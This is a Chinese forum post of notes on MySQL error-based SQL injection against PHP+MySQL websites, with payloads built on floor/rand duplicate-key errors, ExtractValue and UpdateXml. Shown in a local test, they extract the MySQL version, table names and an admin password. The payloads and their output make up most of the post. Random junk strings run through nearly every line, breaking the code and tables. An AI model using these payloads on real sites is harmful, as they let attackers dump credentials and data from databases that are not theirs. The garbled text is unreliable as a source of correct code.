放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。
- C1 L$ `0 E/ u9 T/ C8 k- s. n实际测试环境:% y Z5 i0 Q; ]
+ }0 A' \7 s# M+ z9 ^
( ^* }6 o! e% \1 O. e$ |
mysql> show tables;
% Q( R1 ?5 B1 h2 k; p% v1 T* V9 U+----------------+1 P* m9 [; M% |9 l: d
| Tables_in_test |
* a/ |1 g Q' B- {5 b$ q+----------------+
W0 z2 X8 [+ i( M! s/ T! \| admin |
' h7 b' c$ e( T3 B q| article |, t7 b1 Y4 ~2 j, J. `
+----------------+
5 z; L1 B0 M' Z6 i: P% y b) `) i
* ^- E0 I" p. q3 A2 _7 n
$ H- \1 L( {. P1 |! E' Y ! `; B$ d8 W) H8 |/ B {8 R! p! _
mysql> describe admin;
6 B: j8 d S4 e/ V- X3 F+-------+------------------+------+-----+---------+----------------+3 F$ J% f4 T' p" U, H
| Field | Type | Null | Key | Default | Extra |- ~, l+ j8 a- h# w
+-------+------------------+------+-----+---------+----------------+1 M$ k* Z( E) Q/ ~- `! b Y
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |1 M% F2 E2 r0 n5 i( K" W9 B6 |
| user | varchar(50) | NO | | NULL | |/ L0 {* h7 W! n5 a; D8 O! f
| pass | varchar(50) | NO | | NULL | |
7 V( B& U- T5 K {3 B8 `* v% L7 `+-------+------------------+------+-----+---------+----------------+
- B* i5 J# m1 h) k7 Z7 A2 R( c3 D
. l' L0 o9 M2 }8 I) G) P. t
" [8 p' I- R& T, c1 Z5 F 1 }! P$ E4 @4 W8 ]
mysql> describe article;0 T, ?1 l; }2 f' Z/ b4 S
+---------+------------------+------+-----+---------+----------------+
2 z9 x+ }% w" i1 D& {: R| Field | Type | Null | Key | Default | Extra |5 b/ ]) x7 Z/ S' j3 w9 u
+---------+------------------+------+-----+---------+----------------+9 ~" z) h; V1 h% f' J
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
, D2 U I( G( {4 H1 t4 o6 ?| title | varchar(50) | NO | | NULL | |+ m7 U9 M; U4 S( q
| content | varchar(50) | NO | | NULL | |
j! y9 d( X" V+---------+------------------+------+-----+---------+----------------+
% y9 P* G6 p5 b J1、通过floor报错
9 k* _: U4 S4 \0 ?可以通过如下一些利用代码# N+ Y4 B- Y) q2 r
2 R- P; _$ o* Q9 |* \! ]/ r
- u6 J1 M1 T* b2 qand select 1 from (select count(*),concat(version(),floor(rand(0)*2))x" H6 D* Z6 M e1 R+ e" n+ V: {' F6 J
from information_schema.tables group by x)a);
. a$ R/ r6 M: N 0 Y9 y- n4 e- r$ i7 n- u' ]
4 e/ S1 i) g- L" `* }7 i
and (select count(*) from (select 1 union select null union select !1)x' j" b" b7 P% {! X$ w: y- z# S
group by concat((select table_name from information_schema.tables limit 1),; s" I) Y- U, c
floor(rand(0)*2)));
$ K- G- e7 C% g! M举例如下:
2 w& ? G" q; u( `/ C+ L3 ~首先进行正常查询:; [" X! v: |, X. W% ?* r
. T; Q L* z- E+ Amysql> select * from article where id = 1;7 ^0 b' L- r% g' ?2 S+ m( n
+----+-------+---------+2 A/ r& E* T" k$ Q* q. o
| id | title | content |3 B7 S, o' c: t
+----+-------+---------+
4 l% [, D! P, V. }| 1 | test | do it |$ C& I% c; O! B4 _
+----+-------+---------+
3 O4 O1 q/ q5 g2 Y4 {; z% H假如id输入存在注入的话,可以通过如下语句进行报错。5 D: f, k: W* C/ w- B
+ @( T5 m7 ]0 R; ]$ _- r
p1 O2 ~( R. w& x& ~
mysql> select * from article where id = 1 and (select 1 from* W8 A8 \6 y* ]9 I+ ~6 w1 x9 ^; T
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);* q7 p5 h( y, u9 n6 h
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
5 V1 p2 a8 ]: W* ~3 s' I1 V可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
$ v+ l* ^ f; S# |* c例如我们需要查询管理员用户名和密码:& ~. { E1 B# v$ C% R
Method1:
0 _, P. k& V, t& Q( ]' }" ~
" o; g1 v8 w, ^2 d/ Y% U : e9 f+ l; @& n0 t9 c7 J4 B
mysql> select * from article where id = 1 and (select 1 from
9 A1 D9 C% A% E, y; L(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x) o. P2 K* F7 K# _1 Q+ E7 s- K3 }
from information_schema.tables group by x)a);2 b E `7 \1 Z5 I( d. y' Z% a
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
5 I: S0 i$ P1 c$ `% WMethod2:0 O. s1 W0 E. I% W# P
* K. K3 F! {& D* ~ 8 u4 B* U3 I( [& ~
mysql> select * from article where id = 1 and (select count(*)) k9 D4 U9 L3 d- Q# \- l
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
N) l& K( V$ N8 `% }3 o. s5 Kfloor(rand(0)*2)));
$ ]$ {0 ~* @: t+ M rERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
! N+ K& J' m. A4 J) L( z: y& O2、ExtractValue5 \: R0 `/ T0 t
测试语句如下
4 Q* A1 q; y: ~9 U: l9 v# X: P8 } . A$ }3 \+ \; v5 W) h* z: s3 J( L
- `5 ` z" k1 ~, O/ t* d* land extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
* o5 N. E/ ~' ]4 A$ p7 W0 I实际测试过程
7 o6 h3 {; u5 I
2 o8 H9 c T* K$ c) t7 D( O' q8 M
: e' J4 F4 F( f+ d7 ~) u) T) Emysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
& |1 I: l. h- ~" r5 l, o, w/ _(select pass from admin limit 1)));--9 o' _0 c T! z7 v8 D
ERROR 1105 (HY000): XPATH syntax error: '\admin888'6 O3 |( j% I) e4 y3 G# v
3、UpdateXml
6 @; r m9 Z& t! c1 u测试语句
* \1 h6 p6 h! W4 W3 x6 ] , l) l3 }% f) A. G; ^- L, ?
( S; S& r9 |( wand 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1)), E: \7 n$ _1 P$ c. b
实际测试过程3 V8 b8 `+ X, {; [8 H
, v5 V+ J- X/ r* S . S; ]# Z; k) r, n- H8 [
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
% S; B) ?5 b7 w(select pass from admin limit 1),0x5e24),1));2 ~# Z: x: ~3 K T' h; G
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$' \& K& T' h; W/ h, C
All, thanks foreign guys.5 |. B/ j6 y4 L% F
+ @6 _4 d8 L2 M( g' Z5 X2 j d
* y9 |3 X& x7 c1 q# r5 |
|
发表于 2012-12-10 10:28:51
收藏
支持
反对